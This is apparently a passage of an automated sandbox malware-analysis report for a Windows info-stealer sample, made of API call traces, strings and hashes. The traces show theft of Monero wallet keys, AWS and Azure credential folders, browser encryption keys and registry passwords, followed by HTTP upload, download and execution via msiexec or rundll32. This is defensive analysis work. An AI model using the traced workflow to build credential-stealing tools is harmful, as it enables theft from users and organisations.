                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                          • HttpOpenRequestA.WININET(00000000,0128E5C0,?,0128DBB0,00000000,00000000,00400100,00000000), ref: 00405BF8
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: ac4f865af4aa3e0c16e5010cfb2a8e0f1ad85d16cc29c10ae0f08586dfb824bd
                          • Instruction ID: 0e5facfd5055de801f7f1688313f8c34c81b7350285768c2e278bb72b88d17e9
                          • Opcode Fuzzy Hash: ac4f865af4aa3e0c16e5010cfb2a8e0f1ad85d16cc29c10ae0f08586dfb824bd
                          • Instruction Fuzzy Hash: 9F125171821118ABCB15FBA1DC95FEE7378BF14714F50015EB10A62091DF782B9ACF69
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(00420E1A,012899C8,004205AE,?,?,004013F9,?,0000001A,00420E1A,00000000,?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 00418B86
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D208
                          • lstrcat.KERNEL32(?,00421478), ref: 0040D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D22A
                          • lstrcat.KERNEL32(?,0042147C), ref: 0040D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D24C
                          • lstrcat.KERNEL32(?,00421480), ref: 0040D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D26E
                          • lstrcat.KERNEL32(?,00421484), ref: 0040D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D290
                          • lstrcat.KERNEL32(?,00421488), ref: 0040D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D2B2
                          • lstrcat.KERNEL32(?,0042148C), ref: 0040D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0040D2D4
                          • lstrcat.KERNEL32(?,00421490), ref: 0040D2E3
                            • Part of subcall function 0041A820: lstrlen.KERNEL32(00404F05,?,?,00404F05,00420DDE), ref: 0041A82B
                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0041A885
                          • lstrlen.KERNEL32(?), ref: 0040D32A
                          • lstrlen.KERNEL32(?), ref: 0040D339
                            • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(012888C0,0040A7A7,?,0040A7A7,012888C0), ref: 0041AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: b5b6774b38bbe5c613bd724fcd1069255e6ae182392d22547e929488bfccd0a6
                          • Instruction ID: 2c4570a162c9209662db32344ca83047e0d2bb731ca2817032ce09d5ba58344d
                          • Opcode Fuzzy Hash: b5b6774b38bbe5c613bd724fcd1069255e6ae182392d22547e929488bfccd0a6
                          • Instruction Fuzzy Hash: 86E16D75950108ABCB04FBE1DD96EEE7379AF14304F10015EF106B60A1DE38AA5ACB6A
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0128CC18,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                          • StrStrA.SHLWAPI(?,0128CC60,00420B52), ref: 0040CAF7
                          • StrStrA.SHLWAPI(00000000,0128CCF0), ref: 0040CB1E
                          • StrStrA.SHLWAPI(?,0128D2B8,00000000,?,00421458,00000000,?,00000000,00000000,?,01288800,00000000,?,00421454,00000000,?), ref: 0040CCA2
                          • StrStrA.SHLWAPI(00000000,0128D138), ref: 0040CCB9
                            • Part of subcall function 0040C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0040C871
                            • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                          • StrStrA.SHLWAPI(?,0128D138,00000000,?,0042145C,00000000,?,00000000,012889A0), ref: 0040CD5A
                          • StrStrA.SHLWAPI(00000000,01288AB0), ref: 0040CD71
                            • Part of subcall function 0040C820: lstrcat.KERNEL32(?,00420B46), ref: 0040C943
                            • Part of subcall function 0040C820: lstrcat.KERNEL32(?,00420B47), ref: 0040C957
                            • Part of subcall function 0040C820: lstrcat.KERNEL32(?,00420B4E), ref: 0040C978
                          • lstrlen.KERNEL32(00000000), ref: 0040CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: 2c97f0b674b0cc64eb51e3fcc7201f9f211e9e8e2facb3b8abbaeb1f8af4947d
                          • Instruction ID: ce47a47c009d6352eb47f886e70e5edaf148b34d9121e4636baaed8884c7f2c1
                          • Opcode Fuzzy Hash: 2c97f0b674b0cc64eb51e3fcc7201f9f211e9e8e2facb3b8abbaeb1f8af4947d
                          • Instruction Fuzzy Hash: 20E14F71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • RegOpenKeyExA.ADVAPI32(00000000,0128AC60,00000000,00020019,00000000,004205B6), ref: 004183A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                          • wsprintfA.USER32 ref: 00418459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: d992ae31c4370ba79398660ceb908c9469638050511d1de5a8af4af9992bc93a
                          • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                          • Opcode Fuzzy Hash: d992ae31c4370ba79398660ceb908c9469638050511d1de5a8af4af9992bc93a
                          • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                          APIs
                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00418E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00414DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00414DCD
                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                          • lstrcat.KERNEL32(?,00000000), ref: 00414E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00414E59
                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                            • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                            • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00414EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                            • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                            • Part of subcall function 00414910: lstrcat.KERNEL32(?,0128E4D0), ref: 00414A4A
                            • Part of subcall function 00414910: lstrcat.KERNEL32(?,00420FF8), ref: 00414A5C
                            • Part of subcall function 00414910: lstrcat.KERNEL32(?,?), ref: 00414A70
                            • Part of subcall function 00414910: lstrcat.KERNEL32(?,00420FFC), ref: 00414A82
                            • Part of subcall function 00414910: lstrcat.KERNEL32(?,?), ref: 00414A96
                            • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                            • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: c4fa5dcb2bb5c3f06c8bfa91412fb491c8c97473736fbedb0e4db38ccd7ee9ad
                          • Instruction ID: f000d6c2f448f24832ff43dfc45437f0696cf75d8826a8fca75761153c99f472
                          • Opcode Fuzzy Hash: c4fa5dcb2bb5c3f06c8bfa91412fb491c8c97473736fbedb0e4db38ccd7ee9ad
                          • Instruction Fuzzy Hash: C14186BDA4021467D710F7B0EC47FED7338AB64704F404559B645660C2EEB85BC9CB96
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                          • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                          • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                          • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: c328cdc9be81c501a06adb078cc21fd2a777e696e09ee326a75be493aa109de0
                          • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                          • Opcode Fuzzy Hash: c328cdc9be81c501a06adb078cc21fd2a777e696e09ee326a75be493aa109de0
                          • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                            • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0128E5E0), ref: 00406303
                            • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                            • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0128DBB0,00000000,00000000,00400100,00000000), ref: 00406385
                            • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                            • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                          • lstrlen.KERNEL32(00000000), ref: 0041532F
                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                          • lstrlen.KERNEL32(00000000), ref: 00415383
                          • lstrlen.KERNEL32(00000000), ref: 004153AE
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: a99532bd2d294eafc9623920962e268430e16fc8ae6a36dd000ff70ad9d5140d
                          • Instruction ID: 712b1efc5e9cffa6d85e25cc0d5ccfd3d928df1c32b3a809526078b9d49aab8c
                          • Opcode Fuzzy Hash: a99532bd2d294eafc9623920962e268430e16fc8ae6a36dd000ff70ad9d5140d
                          • Instruction Fuzzy Hash: 4F514130911108EBCB14FF61CD92AED3779AF50354F50401EF40A6B591DF386B96CB6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 7a02cffb099377d4201d2e9291f10bf61413159ad2e3b4e1484e42fc67f17588
                          • Instruction ID: 4a7073b5750037b12307d97dd43dd6b1cfcbfa6166e71f48df9e2dbc49e6d573
                          • Opcode Fuzzy Hash: 7a02cffb099377d4201d2e9291f10bf61413159ad2e3b4e1484e42fc67f17588
                          • Instruction Fuzzy Hash: D0C1D7B5941208ABCB14EF60DC89FEA7379BF54304F0045DEF50A67241DA78AAC5CF95
                          APIs
                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00418E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 004142EC
                          • lstrcat.KERNEL32(?,0128DC88), ref: 0041430B
                          • lstrcat.KERNEL32(?,?), ref: 0041431F
                          • lstrcat.KERNEL32(?,0128CB70), ref: 00414333
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00401B54,?,?,0042564C,?,?,00420E1F), ref: 00418D9F
                            • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,0040148F,00000000), ref: 00409A5A
                            • Part of subcall function 004099C0: LocalFree.KERNEL32(0040148F), ref: 00409A90
                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                            • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                          • StrStrA.SHLWAPI(?,0128DC28), ref: 004143F3
                          • GlobalFree.KERNEL32(?), ref: 00414512
                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                            • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                            • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 004144A3
                          • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004144D2
                          • lstrcat.KERNEL32(00000000,?), ref: 004144E5
                          • lstrcat.KERNEL32(00000000,00420FB8), ref: 004144F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: d620b140cba4f846db9659000884d6f99d6e686b8edb28011cd315dfa72b518a
                          • Instruction ID: db4b38d3214fd49b51c6fefb648249eaa571636795fccd23eedf93bd9b9a74f9
                          • Opcode Fuzzy Hash: d620b140cba4f846db9659000884d6f99d6e686b8edb28011cd315dfa72b518a
                          • Instruction Fuzzy Hash: 897156B6910208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                          APIs
                            • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004012B4
                            • Part of subcall function 004012A0: RtlAllocateHeap.NTDLL(00000000), ref: 004012BB
                            • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                            • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004012F5
                            • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0040134F
                          • lstrlen.KERNEL32(?), ref: 0040135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00401377
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(00420E1A,012899C8,004205AE,?,?,004013F9,?,0000001A,00420E1A,00000000,?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 00418B86
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,0040148F,00000000), ref: 00409A5A
                            • Part of subcall function 004099C0: LocalFree.KERNEL32(0040148F), ref: 00409A90
                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 771b9f8fbee469c706167788f983bf5398b85f3009b7fdedb01d081a7709bf8e
                          • Instruction ID: 2043a3887805ea6c56e3178cdbea9a9898fb9ec432e120889b6b1f894c0cfb52
                          • Opcode Fuzzy Hash: 771b9f8fbee469c706167788f983bf5398b85f3009b7fdedb01d081a7709bf8e
                          • Instruction Fuzzy Hash: 115163B1D5011897CB15FB61DD92FED737CAF50304F4041ADB20A62091EE385BDACBAA
                          APIs
                            • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0040733A
                            • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                            • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                            • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00407452
                            • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000), ref: 00407459
                          • lstrcat.KERNEL32(00000000,004217FC), ref: 00407606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00407648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0040765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040768F
                          • lstrcat.KERNEL32(00000000,00421804), ref: 004076A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004076D3
                          • lstrcat.KERNEL32(00000000,00421808), ref: 004076ED
                          • task.LIBCPMTD ref: 004076FB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                          • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                          • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                          • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0128D838,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00418137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                          • __aulldiv.LIBCMT ref: 00418172
                          • __aulldiv.LIBCMT ref: 00418180
                          • wsprintfA.USER32 ref: 004181AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                          • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                          • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                          • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 004047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                          • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                          • StrCmpCA.SHLWAPI(?,0128E5E0), ref: 00406147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 004061DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                          • InternetCloseHandle.WININET(?), ref: 00406253
                          • InternetCloseHandle.WININET(00000000), ref: 00406260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: ab3784fe0b46da7b28e8c10d9ea5d0b529e82314f904c2f6f7e079643bbd3618
